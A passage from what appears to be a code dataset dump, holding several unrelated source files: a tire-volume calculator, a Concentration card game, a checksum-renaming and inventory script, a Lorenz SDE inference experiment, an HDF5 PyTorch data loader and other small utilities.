the now() method to get the current date and\r\n# time as a datetime object from the computer's clock.\r\ncurrent_date_and_time = datetime.now()\r\n\r\n#The size of a car tire in the United States is represented with three numbers like this: 205/60R15. \r\n#The first number is the width of the tire in millimeters. \r\n#The second number is the aspect ratio. \r\n#The third number is the diameter in inches of the wheel that the tire fits.\r\n\r\n#This function applies the formula to the 3 values we get from the user\r\ndef calculate_volume(width,ratio,diameter):\r\n volume = float((math.pi * width**2 * ratio * (width * ratio + (2540 * diameter)))/10000000)\r\n return volume\r\n\r\nwidth = float(input(\"Enter the width of the tire in mm: \"))\r\nratio = float(input(\"Enter the aspect ratio of the tire: \"))\r\ndiameter = float(input(\"Enter the diameter of the wheel in inches: \"))\r\nprint()\r\nvolume = calculate_volume(width, ratio, diameter)\r\nprint(f\"The approximate volume is {volume:.1f} millimeters\")\r\nprint()\r\n
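\r\n# Worked check of the formula above (added sketch, not part of the original assignment):\r\n# for a 205/60R15 tire, pi * 205**2 * 60 * (205*60 + 2540*15) / 10**7 is about 39924.5\r\nassert round(calculate_volume(205, 60, 15), 1) == 39924.5\r\n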
(yes/no): \")\r\nif buy_tire.lower() == \"yes\":\r\n print(\"We will save your name and phone number to contact you later\")\r\n name = input(\"Please type your full name: \")\r\n phone_number = int(input(\"Please type your phone number: \"))\r\n\r\n#This code opens a new file with appending mode with all the information above\r\n with open(\"volumes.txt\", \"at\") as volumes_file:\r\n print(f\"Date: {current_date_and_time}\", file=volumes_file)\r\n print(f\"Width: {width}; Aspect ratio: {ratio}; Diameter: {diameter}\", file=volumes_file)\r\n print(f\"Volume: {volume:.1f} milimeters\", file=volumes_file)\r\n print(f\"{name}; {phone_number}\", file=volumes_file)\r\n\r\nelse: \r\n with open(\"volumes.txt\", \"at\") as volumes_file:\r\n print(f\"Date: {current_date_and_time}\", file=volumes_file)\r\n print(f\"Width: {width}; Aspect ratio: {ratio}; Diameter: {diameter}\", file=volumes_file)\r\n print(f\"Volume: {volume:.1f} milimeters\", file=volumes_file)\r\n\r\n\r\n","sub_path":"02PA_TireVolume.py","file_name":"02PA_TireVolume.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"30976833","text":"times = 0\nwhile 1:\n n = int(input())\n if (n == 0):\n break\n\n if (times != 0):\n print('')\n\n times += 1\n\n arr = []\n maximo = 0\n\n for i in range(n):\n m = input()\n m_no_space = \" \".join(m.split())\n\n if (len(m_no_space) > maximo):\n maximo = len(m_no_space)\n\n arr.append(m_no_space)\n\n space = ' '\n\n for item in arr:\n print('%s%s' % (space * (maximo - len(item)), item))\n","sub_path":"string/1278.py","file_name":"1278.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"89066354","text":"from IPython.core.magic import Magics, magics_class, line_magic\n\nfrom .r_support import load_ipython_extension as r_load_ipython_extension\n\n\"\"\"\nJupyter-related extensions for nbtools\n\"\"\"\n\n\ndef load_ipython_extension(ipython):\n try: # Try to load R support, ignore if rpy2 not installed\n r_load_ipython_extension(ipython)\n except ImportError:\n pass\n ipython.log.info(\"Notebook Tool Manager IPython loaded!\")\n\n\ndef _jupyter_server_extension_paths():\n return [{\n \"module\": \"nbtools\"\n }]\n\n\ndef _jupyter_nbextension_paths():\n return [dict(\n section=\"notebook\",\n # the path is relative to the `my_fancy_module` directory\n src=\"static\",\n # directory in the `nbextension/` namespace\n dest=\"nbtools\",\n # _also_ in the `nbextension/` namespace\n require=\"nbtools/nbtools\")]\n\n\ndef load_jupyter_server_extension(nbapp):\n nbapp.log.info(\"Notebook Tool Manager enabled!\")","sub_path":"nbtools/jupyter_extensions.py","file_name":"jupyter_extensions.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"384619723","text":"#!/usr/bin/python\n\n\"\"\" Tries to pull the node data from S3. 
","sub_path":"string/1278.py","file_name":"1278.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"89066354","text":"from IPython.core.magic import Magics, magics_class, line_magic\n\nfrom .r_support import load_ipython_extension as r_load_ipython_extension\n\n\"\"\"\nJupyter-related extensions for nbtools\n\"\"\"\n\n\ndef load_ipython_extension(ipython):\n try: # Try to load R support, ignore if rpy2 not installed\n r_load_ipython_extension(ipython)\n except ImportError:\n pass\n ipython.log.info(\"Notebook Tool Manager IPython loaded!\")\n\n\ndef _jupyter_server_extension_paths():\n return [{\n \"module\": \"nbtools\"\n }]\n\n\ndef _jupyter_nbextension_paths():\n return [dict(\n section=\"notebook\",\n # the path is relative to the `my_fancy_module` directory\n src=\"static\",\n # directory in the `nbextension/` namespace\n dest=\"nbtools\",\n # _also_ in the `nbextension/` namespace\n require=\"nbtools/nbtools\")]\n\n\ndef load_jupyter_server_extension(nbapp):\n nbapp.log.info(\"Notebook Tool Manager enabled!\")","sub_path":"nbtools/jupyter_extensions.py","file_name":"jupyter_extensions.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"384619723","text":"#!/usr/bin/python\n\n\"\"\" Tries to pull the node data from S3. Returns an error code unless the --silent flag is on, in which case only a warning is output.\n\n Usage python state_puller.py PATH_OR_FILE --silent\n:return: error code\n\"\"\"\n\nimport argparse\nimport asyncio\nimport logging\nimport os\nimport sys\nimport time\nfrom enum import IntEnum\nfrom pathlib import Path\n\nfrom simcore_sdk.node_data import data_manager\nfrom simcore_sdk.node_ports import exceptions\n\nlogging.basicConfig(level=logging.INFO)\nlog = logging.getLogger(__file__ if __name__ == \"__main__\" else __name__)\n\n\nclass ExitCode(IntEnum):\n SUCCESS = 0\n FAIL = 1\n\n\ndef state_path() -> Path:\n path = os.environ.get(\"SIMCORE_NODE_APP_STATE_PATH\", \"undefined\")\n assert path != \"undefined\", \"SIMCORE_NODE_APP_STATE_PATH is not defined!\"\n return Path(path)\n\n\ndef main(args=None) -> int:\n try:\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\"--path\", help=\"The folder or file to get for the node\",\n type=Path, default=state_path(), required=False)\n parser.add_argument(\"--silent\", help=\"The script will silently fail if the flag is on\",\n default=False, const=True, action=\"store_const\", required=False)\n parser.add_argument(\"type\", help=\"push or pull\",\n choices=[\"push\", \"pull\"])\n options = parser.parse_args(args)\n\n loop = asyncio.get_event_loop()\n\n # push or pull state\n start_time = time.clock()\n loop.run_until_complete(getattr(data_manager, options.type)(options.path))\n end_time = time.clock()\n log.info(\"time to %s: %.2f seconds\", options.type, end_time - start_time)\n return ExitCode.SUCCESS\n\n except exceptions.S3InvalidPathError:\n if options.silent:\n log.warning(\"Could not %s state from S3 for %s\", options.type, options.path)\n return ExitCode.SUCCESS\n log.exception(\"Could not %s state from S3 for %s\", options.type, options.path)\n return ExitCode.FAIL\n except: # pylint: disable=bare-except\n log.exception(\"Unexpected error when %s state from/to S3 for %s\", options.type, options.path)\n return ExitCode.FAIL\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"services/dy-3dvis/src/3d-viewer/utils/state_manager.py","file_name":"state_manager.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"309175324","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Feb 27 13:43:34 2020\n\n@author: gustavo\n\"\"\"\n\nimport numpy as np\n\n#2 + 4 * x - 5 * x**2 + 2 * x**3 - 6 * x**4 + \\\n# 8 * x**5 + 10 * x**6\n\n#the coefficients are entered from the lowest power of x to the highest\na = [2, 4, -5, 2, -6, 8, 10]\n\nx0 = [-1.5, -0.65, 0.1, 1.4, 2.87]\n\n#the polyval function requires the powers of x to be entered from the highest\n#to the lowest, which is why reverse is used\na.reverse()\n\nprint ('Polynomial coefficients in reverse order')\nprint(a)\nprint()\n\n\nfor i in x0:\n valor = np.polyval(a, i)\n print(valor)\n
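#Added for reference (not in the original file): Horner's rule evaluates the\n#same polynomial with one multiply-add per coefficient, taking the highest\n#power first, the same ordering numpy.polyval expects\ndef horner(coefs, x):\n    valor = 0.0\n    for c in coefs:\n        valor = valor*x + c #fold in one coefficient per step\n    return valor\n\n#horner(a, 0.1) matches np.polyval(a, 0.1), since a was reversed above\n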
print(\"*\"+4*\" \"+len(name)*\" \"+4*\" \"+\"*\")\r\n print(5*\"*\"+len(name)*\"*\"+5*\"*\")\r\n print()\r\n \r\ndef shuffle_deck(deck):\r\n '''(list of str)->None\r\n Shuffles the given list of strings representing the playing deck \r\n '''\r\n print(\"Shuffling the deck...\\n\")\r\n random.shuffle(deck)\r\n\r\ndef create_board(size):\r\n '''int->list of str\r\n Precondition: size is even positive integer between 2 and 52\r\n Returns a rigorous deck of cards for you\r\n '''\r\n board = [None]*size \r\n\r\n letter='A'\r\n for i in range(len(board)//2):\r\n board[i]=letter\r\n board[i+len(board)//2 ]=board[i]\r\n letter=chr(ord(letter)+1)\r\n return board\r\n\r\ndef print_board(a):\r\n '''(list of str)->None\r\n Prints the current board in a nicely formated way\r\n '''\r\n for i in range(len(a)):\r\n print('{0:4}'.format(a[i]), end=' ')\r\n print()\r\n for i in range(len(a)):\r\n print('{0:4}'.format(str(i+1)), end=' ')\r\n\r\n\r\ndef wait_for_player():\r\n '''()->None\r\n Pauses the program/game until the player presses enter\r\n '''\r\n input(\"\\nPress enter to continue. \")\r\n print()\r\n\r\ndef print_revealed(discovered, p1, p2, original_board):\r\n '''(list of str, int, int, list of str)->None\r\n Prints the current board with the two new positions (p1 & p2) revealed from the original board\r\n Preconditions: p1 & p2 must be integers ranging from 1 to the length of the board\r\n '''\r\n\r\n discovered[p1 - 1] = original_board[p1 - 1] # Note: This alters the \"discovered\" list\r\n discovered[p2 - 1] = original_board[p2 - 1]\r\n \r\n print_board(discovered)\r\n print()\r\n \r\n\r\n#############################################################################\r\n# FUNCTIONS FOR OPTION 2 (with the board being read from a given file) #\r\n#############################################################################\r\n\r\n\r\ndef read_raw_board(file):\r\n '''str->list of str\r\n Returns a list of strings represeniting a deck of cards that was stored in a file. \r\n The deck may not necessarifly be playable\r\n '''\r\n\r\n raw_board = open(file).read().splitlines()\r\n for i in range(len(raw_board)):\r\n raw_board[i]=raw_board[i].strip()\r\n return raw_board\r\n\r\n\r\n# This functions does at most O(n log n) operations where n = len(l)\r\n# If input list l was already sorted then l=sorted(l) line could be removed and\r\n# the resulting funciton would do at most O(n) operations where n = len(l)\r\n#\r\ndef clean_up_board(l):\r\n '''list of str->list of str\r\n\r\n The functions takes as input a list of strings representing a deck of cards. 
\r\ndef print_board(a):\r\n '''(list of str)->None\r\n Prints the current board in a nicely formatted way\r\n '''\r\n for i in range(len(a)):\r\n print('{0:4}'.format(a[i]), end=' ')\r\n print()\r\n for i in range(len(a)):\r\n print('{0:4}'.format(str(i+1)), end=' ')\r\n\r\n\r\ndef wait_for_player():\r\n '''()->None\r\n Pauses the program/game until the player presses enter\r\n '''\r\n input(\"\\nPress enter to continue. \")\r\n print()\r\n\r\ndef print_revealed(discovered, p1, p2, original_board):\r\n '''(list of str, int, int, list of str)->None\r\n Prints the current board with the two new positions (p1 & p2) revealed from the original board\r\n Preconditions: p1 & p2 must be integers ranging from 1 to the length of the board\r\n '''\r\n\r\n discovered[p1 - 1] = original_board[p1 - 1] # Note: This alters the \"discovered\" list\r\n discovered[p2 - 1] = original_board[p2 - 1]\r\n \r\n print_board(discovered)\r\n print()\r\n \r\n\r\n#############################################################################\r\n# FUNCTIONS FOR OPTION 2 (with the board being read from a given file) #\r\n#############################################################################\r\n\r\n\r\ndef read_raw_board(file):\r\n '''str->list of str\r\n Returns a list of strings representing a deck of cards that was stored in a file. \r\n The deck may not necessarily be playable\r\n '''\r\n\r\n raw_board = open(file).read().splitlines()\r\n for i in range(len(raw_board)):\r\n raw_board[i]=raw_board[i].strip()\r\n return raw_board\r\n\r\n\r\n# This function does at most O(n log n) operations where n = len(l)\r\n# If input list l was already sorted then l=sorted(l) line could be removed and\r\n# the resulting function would do at most O(n) operations where n = len(l)\r\n#\r\ndef clean_up_board(l):\r\n '''list of str->list of str\r\n\r\n This function takes as input a list of strings representing a deck of cards. \r\n It returns a new list containing the same cards as l except that\r\n one of each card that appears an odd number of times in l is removed\r\n and all the cards with a * on their face sides are removed\r\n '''\r\n print(\"\\nRemoving one of each card that appears an odd number of times and removing all stars ...\\n\")\r\n playable_board=[]\r\n\r\n l=sorted(l) # O(n log n)\r\n #print(l)\r\n i=0\r\n while i<len(l)-1: # O(n)\r\n if l[i]==l[i+1] and '*' not in l[i]:\r\n playable_board.append(l[i])\r\n playable_board.append(l[i+1])\r\n i=i+2\r\n else:\r\n i=i+1\r\n return playable_board\r\n\r\n\r\ndef is_rigorous(l):\r\n '''(list of str)->bool\r\n Returns True if every element in the list appears exactly 2 times or the list is empty.\r\n Otherwise, it returns False.\r\n\r\n Precondition: Every element in the list appears an even number of times\r\n '''\r\n if len(l)==0: return True\r\n \r\n l=sorted(l) # O(n log n)\r\n for i in range(len(l)-2): # O(n)\r\n if l[i]==l[i+2]: # l[i] appears at least 3 times in the list\r\n return False\r\n return True\r\n \r\n \r\n\r\n####################################################################\r\n
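\r\n# Added compact variant (illustrative only, the game below does not use it):\r\n# collections.Counter expresses the is_rigorous check in one line\r\nfrom collections import Counter\r\n\r\ndef is_rigorous_alt(l):\r\n    '''(list of str)->bool\r\n    True iff every card appears exactly 2 times (or the list is empty)'''\r\n    return all(n == 2 for n in Counter(l).values())\r\n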
That is \" + str(guesses - len(board)//2) + \" more than the best possible.\")\r\n\r\n\r\n\r\n # YOUR CODE GOES HERE\r\n # this is the funciton that plays the game\r\n\r\n\r\n\r\n# MAIN\r\n\r\nascii_name_plaque(\"Welcome to my Concentration game\")\r\nprint()\r\n\r\nprint(\"Would you like (enter 1 or 2 to indicate your choice):\")\r\nprint(\"(1) me to generate a rigorous deck of cards for you\")\r\nprint(\"(2) or, would you like me to read a deck from a file?\")\r\n\r\nchoice=int(input())\r\nwhile choice!=1 and choice!=2:\r\n print(choice, \"is not existing option. Please try again. Enter 1 or 2 to indicate your choice\")\r\n choice=int(input())\r\n\r\nif choice==1:\r\n print(\"You chose to have a rigorous deck generated for you\")\r\n size=-1\r\n while size % 2 != 0 or size not in range(0,53):\r\n size = int(input(\"\\nHow many cards do you want to play with?\\nEnter an even number between 0 and 52: \"))\r\n\r\n # this creates the board for you of the given size\r\n board=create_board(size)\r\nelse: # choice ==2\r\n print(\"You chose to load a deck of cards from a file\")\r\n file=input(\"Enter the name of the file: \")\r\n file=file.strip()\r\n board=read_raw_board(file)\r\n board=clean_up_board(board)\r\n if is_rigorous(board):\r\n s=\"This deck is now playable and rigorous and it has \"+str(len(board))+\" cards.\"\r\n ascii_name_plaque(s)\r\n else:\r\n s=\"This deck is now playable but not rigorous and it has \"+str(len(board))+\" cards.\"\r\n ascii_name_plaque(s)\r\n wait_for_player()\r\n print(\"\\n\"*50)\r\n\r\n \r\nshuffle_deck(board)\r\nwait_for_player()\r\nprint(\"\\n\"*50)\r\nif len(board)==0:\r\n print(\"\\nThe resulting board is empty. \\nPlaying Concentration game with an empty board is impossible.\\nGood bye\")\r\nelse:\r\n play_game(board)\r\n \r\n \r\n \r\n","sub_path":"Assignment 0/V1/A3-for-ITI1121/A3-game-solved.py","file_name":"A3-game-solved.py","file_ext":"py","file_size_in_byte":8540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"100757816","text":"'''\n*********************************************************\n Copyright 2013 EMC Inc.\n\n[Filename]: tc_bmc_ms_4834_CheckBatterySensorReading.py\n[Author ]: Jane.Jin@emc.com\n[Purpose ]: Check available Battery sensor reading\n[Contains]: \n tc_bmc_ms_4834_CheckBatterySensorReading - class\n __init__\n test\n[History ]:\n********************************************************************\n VERSION EDITOR DATE COMMENT\n********************************************************************\n V1.0 Jane.Jin@emc.com 05/22/2014 First edition\n********************************************************************\n'''\n\nfrom case.CBaseCase import *\n\nclass T4834_bmc_CheckBatterySensorReading(CBaseCase):\n \"\"\"\n************************************************************************************************\n[Purpose ]: Check available Battery sensor reading\n[Author ]: Jane.Jin@emc.com\n[Method ]:\n[ReqID ]: \n[Sprint ]: ATOM2.0.21\n[Ticket ]: ATOM-1252\n[Platform]: Megatron, Triton\n[Type ]: Auto\n************************************************************************************************\n \"\"\"\n\n def __init__(self):\n CBaseCase.__init__(self, self.__class__.__name__)\n\n \n def test(self): \n \n if not self.enclosure.sp.verify_battery_temp():\n self.result(FAIL, 'Fail to verify the Battery Temp sensor reading')\n \n if not self.enclosure.sp.verify_battery_i2c_status():\n self.result(FAIL, 'Fail to verify the Battery I2C status sensor reading')\n \n if not 
self.enclosure.sp.verify_battery_gpio_status():\n self.result(FAIL, 'Fail to verify the Battery GPIO status sensor reading')\n \n \n \n\n\n\n\n\n\n\n","sub_path":"case/regression/bmc/T4834_bmc_CheckBatterySensorReading.py","file_name":"T4834_bmc_CheckBatterySensorReading.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"337908757","text":"#!/usr/bin/env python\n\n'''\nWinnie Schwaid-Lindner - v.01 of file renaming and inventory script.\n\n1. Ask the root directory, hash algorithm, and which file types to process before calculating an individual file's checksum according to the submitted parameters.\n2. Calculate the checksum\n3. Append the checksum to the file name\n4. Produce an inventory of all the file names in each directory with the fields:\n * Time stamp of file processed\n * Full file path\n * Directory that the file is in\n * Original file name\n * New file name which includes the checksum\n * Notes whether the file is being processed by the script for the first time (Boolean value)\n * Notes whether the most recently generated checksum matches a past generated checksum (compares checksum to file name, this is also Boolean)\n\n'''\n\nimport os, subprocess, datetime, time, sys, imghdr\nfrom pydub import AudioSegment\n\n#'G:\\Snakes\\Test_Documents\\Contained_Test'\n#'G:\\Snakes\\Test_Documents\\Contained_Test\\This_is_a_folder'\n\n\n\n\nfile_dir = ''\nwhile '\\\\' not in file_dir:\n file_dir = input('Paste the *FULL* path to the folder directory that you would like to process:\\n> ') # the directory you want to work with\n\ntoday = datetime.date.today()\nchecksum_options = ['SHA1', 'MD5', 'SHA256']\nchecksum_type = (input('Select your checksum type! Options are \"MD5\", \"SHA1\", or \"SHA256\". Default is set to \"MD5\".\\n> ')).upper()\nif checksum_type not in checksum_options: # if you didn't select a valid checksum, it'll go MD5.\n print('Your choice is not on the list. 
Defaulting to MD5 checksums.')\n checksum_type = 'MD5'\n\nfile_type_string = input('List file types that you would like to process separated by a space (ex \"pdf jpg xml docx\")\\nNOTE: If you do not input a file type, every file in the folder will be processed.\\n> ')\nfile_types = file_type_string.split() # separate file types from one string into a list \n \nfor root, dirs, files in os.walk(file_dir): # for each folder and file within that directory\n inventory_acc = 'sep=`\\nProcessingTimeStamp`FilePath`RootDirectory`OrigFileName`ChecksumFileName`Checksum`NewFile?`ChecksumMatchesPast?`FileCorrupt?\\n' # reset for every dir\n for name in files:\n if name.endswith(tuple(file_types)) or file_type_string == '': # select file types to process\n new_file = '' # reset for every file\n checksum_consistent = '' # reset for every file\n name_without_checksum = '' # reset for every file\n file_name_with_checksum = '' # reset for every file\n file_corrupt = ''\n \n \n if 'SHA1' not in name and 'MD5' not in name and 'SHA256' not in name and (name.startswith('__') == False): # make sure that the file name does not already have a checksum generated\n new_file = 'YES'\n old_name_with_path = (os.path.join(root, name)) # the complete file name including the path\n file_list = name.split('.') # split the portions of the file name to separate the extension\n file_ext = file_list[-1:] # the file extension only without the period (ex 'jpg')\n name_without_ext = '.'.join(map(str, file_list[:-1])) # the name of the file only without the extension (ex 'cute_dogs'), joined so that if a file name includes a '.' it's ok\n name_without_checksum = name\n run_checksum = subprocess.check_output(('certUtil -hashfile \"' + old_name_with_path + '\" ' + checksum_type), shell=True) # get the checksum using certUtil CLI, this is MD5 but this can be changed\n checksum_split = run_checksum.decode().split('\\r\\n') # split the returned string by line\n checksum = checksum_split[1] # take only the second line, which is the checksum\n file_name_with_checksum = (name_without_ext + '___' + checksum_type.upper() + '_' + checksum + '.' 
+ str(file_ext)[2:-2]) # create a completed new filename\n name_with_path = (os.path.join(root, file_name_with_checksum)) # new file name including path\n os.rename(old_name_with_path, name_with_path) # rename old file name to new, which includes checksum\n else:\n name_with_path = (os.path.join(root, name))\n old_file_name_split = name.split('___') # split the portions of the file name to separate the original file name\n file_list = name.split('.') # split the portions of the file name to separate the extension\n file_ext = file_list[-1]\n file_name_parts = [old_file_name_split[0], file_list[-1]]\n name_without_checksum = '.'.join(map(str, file_name_parts))\n file_name_with_checksum = name\n run_checksum = subprocess.check_output(('certUtil -hashfile \"' + name_with_path + '\" ' + checksum_type), shell=True)\n checksum_split = run_checksum.decode().split('\\r\\n') # split the returned string by line\n checksum = checksum_split[1] # take only the second line, which is the checksum\n if checksum not in name:\n checksum_consistent = 'CHECKSUM DOES NOT MATCH FILE NAME'\n\n if name.endswith(\"mp3\") or name.endswith(\"wav\") or name.endswith(\"dsd\"):\n file_corrupt = ''\n try:\n sound = AudioSegment.from_file(name_with_path)\n loudness = sound.dBFS\n except:\n exc = sys.exc_info()[:-1]\n file_corrupt = 'ERROR'\n print(file_corrupt, name_with_path, exc)\n #problems start here \n if name.endswith(\"jpg\") or name.endswith(\"tiff\") or name.endswith(\"pdf\"):\n e = ''\n try:\n img = imghdr.what(name_with_path)\n if img == None:\n file_corrupt = 'ERROR'\n print(file_corrupt, name_with_path, 'img == None')\n except:\n exc = sys.exc_info()\n file_corrupt = 'ERROR'\n print(file_corrupt, name_with_path, exc)\n\n time_stamp = time.strftime(\"%Y-%m-%d_%Hh%Mm%Ss\")\n inventory_acc += ('\"%s\"`\"%s\"`\"%s\"`\"%s\"`\"%s\"`\"%s\"`\"%s\"`\"%s\"`\"%s\"\\n' % (time_stamp, name_with_path, root, name_without_checksum, file_name_with_checksum, checksum, new_file, checksum_consistent, file_corrupt)) # an accumulator that adds all inventory information for the .csv\n time_stamp = time.strftime(\"%Y-%m-%d_%Hh%Mm%Ss\")\n local_folder = str(root.split('\\\\')[-1]) # identifying most local directory\n inventory_name = (str(root) + '\\\\__' + local_folder + '__Inventory_' + str(time_stamp) + '.csv') # the file name for the generated inventory. 
This will start with two underscores for easy sorting within the directory and also contain the directory's name in its own file name in case the inventory becomes disassociated.\n with open(inventory_name, 'w+') as outfile: # creates new file for inventory\n outfile.writelines(inventory_acc) # fills in accumulator\n outfile.close() # all done!\n print(root, 'inventory completed')\n\n\n","sub_path":"obsolete___file-name-checksums.py","file_name":"obsolete___file-name-checksums.py","file_ext":"py","file_size_in_byte":7171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"334697492","text":"from DIS import DIS\nfrom Lorenz_functions import Lorenz_model\nfrom time import time\nfrom SDE import LorenzSDE, NeuralLorenzSDE\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport tensorflow_probability as tfp\ntfb = tfp.bijectors\ntfd = tfp.distributions\ntfe = tf.contrib.eager\ntf.enable_eager_execution()\nimport matplotlib.pyplot as plt\nplt.ion()\n\npars0, T, dt, x0, true_path, obs_data, obs_indices = np.load('Lorenz_data.npy',\n allow_pickle=True)\ntrue_path = np.hstack((np.expand_dims(x0, axis=1), true_path))\n\nobs_indices1 = [i+1 for i in obs_indices] #adjust to 1-based indexing for plots\n\n##Prior is Exp(0.1)\nbase = tfd.Independent(\n distribution = tfd.Uniform(low = np.zeros(4, dtype=np.float32),\n high = np.ones(4, dtype=np.float32)),\n reinterpreted_batch_ndims=1)\nunif2exp = [tfb.AffineScalar(scale=-10.), tfb.Invert(tfb.Exp())]\nbijector = tfb.Chain(unif2exp)\nprior = tfd.TransformedDistribution(base, bijector)\n\ninitial_target = LorenzSDE(x0=x0, T=T, dt=dt,\n theta_dist=prior,\n replace_rejected_samples=True)\n\nlorenz_model = Lorenz_model(x0=x0, T=T, dt=dt, obs_indices=obs_indices,\n obs_data=obs_data, prior=prior,\n initial_target=initial_target, obs_scale=0.2)\n\n## Approximating family\ndis_approx = NeuralLorenzSDE(x0=x0, T=T, dt=dt,\n obs_indices=obs_indices, obs_data=obs_data,\n hidden_size_x=(80,80,80),\n hidden_size_theta=(30,30,30), nlayers_theta=8)\n\ndis_opt = tf.train.AdamOptimizer()\ndis = DIS(model=lorenz_model, q=dis_approx, optimiser=dis_opt,\n importance_size=50000, ess_target=2500, max_weight=0.1)\n\nstart_time = time()\n\npaths_toplot = 30\npaths0 = np.zeros((paths_toplot,3,1))\nfor j in range(3):\n paths0[:,j,:] = x0[j]\n\ni = 0\nwhile dis.eps > 0.:\n dis.train(iterations=100)\n elapsed = time() - start_time\n print('Elapsed time (mins) {:.1f}'.format(elapsed/60.))\n # Plot some IS output\n output_sample = [b.numpy() for b in dis.batches]\n output_sample = np.vstack(output_sample)\n pars_sample = output_sample[:,0:3]\n df = pd.DataFrame(pars_sample,\n columns=['theta1', 'theta2', 'theta3'])\n plt.close(1)\n plt.close(2)\n scat = pd.plotting.scatter_matrix(df)\n # Show true parameter values\n # and extend axis to include them\n for j in range(3):\n scat[j,j].axvline(x=pars0[j], c='k')\n lims = list(scat[j,j].get_xlim())\n lims[0] = np.min((lims[0], pars0[j]))\n lims[1] = np.max((lims[1], pars0[j]))\n scat[j,j].set_xlim(lims)\n plt.savefig('Lorenz_ex2_pars{:d}.pdf'.format(i))\n plt.figure()\n paths = np.reshape(output_sample[0:paths_toplot, 4:], (paths_toplot, 3, -1),\n order='F')\n paths = np.concatenate((paths0, paths), 2)\n\n for j in range(paths_toplot):\n plt.plot(range(T+1), paths[j,0,:], 'r-.', alpha=0.3)\n plt.plot(range(T+1), paths[j,1,:], 'b:', alpha=0.3)\n plt.plot(range(T+1), paths[j,2,:], 'g--', alpha=0.3)\n plt.plot(range(T+1), true_path[0,:], 'r-')\n plt.plot(range(T+1), 
true_path[1,:], 'b-')\n plt.plot(range(T+1), true_path[2,:], 'g-')\n plt.plot(obs_indices1, obs_data[:,0], 'ro', ms=10, alpha=0.8)\n plt.plot(obs_indices1, obs_data[:,1], 'bo', ms=10, alpha=0.8)\n plt.plot(obs_indices1, obs_data[:,2], 'go', ms=10, alpha=0.8)\n plt.xlabel('i')\n plt.savefig('Lorenz_ex2_paths{:d}.pdf'.format(i))\n\n plt.pause(0.1)\n i += 1\n\nnp.save('Lorenz_example2_pars', pars_sample)\nwait = input('Press enter to terminate')\n","sub_path":"Lorenz_example2.py","file_name":"Lorenz_example2.py","file_ext":"py","file_size_in_byte":3730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"71741126","text":"import random\nimport os\nfrom pathlib import Path\n\nimport h5py\nimport torch\nimport torch.utils.data as data\n\nimport data_transform\nfrom torch.utils.data import DataLoader\n\nclass TrainFromHdf5(data.Dataset):\n \"\"\"\n Creates a training set from a hdf5 file\n \"\"\"\n def __init__(self, file_path, patch_size, num_crops, transform=None):\n \"\"\"\n Keyword arguments:\n hdf_file -- the location containing the hdf5 file\n patch_size -- the size of the patches to extract for training\n num_crops -- the number of patches to extract for training\n transform -- an optional transform to apply to the data\n \"\"\"\n super()\n self.file_path = file_path\n with h5py.File(\n file_path, mode='r', libver='latest', swmr=True) as h5_file:\n self.num_samples = h5_file['train/colour'].attrs['shape'][0]\n self.grid_size = h5_file['train/colour'].attrs['shape'][1]\n self.depth = '/train/disparity/images'\n self.colour = '/train/colour/images'\n self.transform = transform\n self.patch_size = patch_size\n self.num_crops = num_crops\n random.seed()\n\n def __getitem__(self, index):\n \"\"\"\n Return item at index in 0 to len(self)\n In this case a set of crops from an lf sample\n Return type is a dictionary of depth and colour arrays\n \"\"\"\n with h5py.File(\n self.file_path, mode='r',\n libver='latest', swmr=True) as h5_file:\n idx = index // self.num_crops\n depth = torch.squeeze(torch.tensor(\n h5_file[self.depth][idx], dtype=torch.float32))\n colour = torch.tensor(\n h5_file[self.colour][idx], dtype=torch.float32)\n grid_size = self.grid_size\n sample = {'depth': depth, 'colour': colour, 'grid_size': grid_size}\n\n sample = data_transform.get_random_crop(sample, self.patch_size)\n sample = data_transform.random_gamma(sample)\n\n if self.transform:\n sample = self.transform(sample)\n\n return sample\n\n def __len__(self):\n \"\"\"Return the number of samples in the dataset\"\"\"\n return self.num_samples * self.num_crops\n\nclass ValFromHdf5(data.Dataset):\n \"\"\"\n Creates a validation set from a hdf5 file\n \"\"\"\n def __init__(self, file_path, transform=None):\n \"\"\"\n Keyword arguments:\n hdf_file -- the location containing the hdf5 file\n transform -- an optional transform to apply to the data\n \"\"\"\n super()\n self.file_path = file_path\n with h5py.File(\n file_path, mode='r', libver='latest', swmr=True) as h5_file:\n self.num_samples = h5_file['val/colour'].attrs['shape'][0]\n self.grid_size = h5_file['val/colour'].attrs['shape'][1]\n self.depth = '/val/disparity/images'\n self.colour = '/val/colour/images'\n self.transform = transform\n\n def __getitem__(self, index):\n \"\"\"\n Return item at index in 0 to len(self)\n In this case a set of crops from an lf sample\n Return type is a dictionary of depth and colour arrays\n \"\"\"\n with h5py.File(\n self.file_path, mode='r',\n libver='latest', swmr=True) as h5_file:\n 
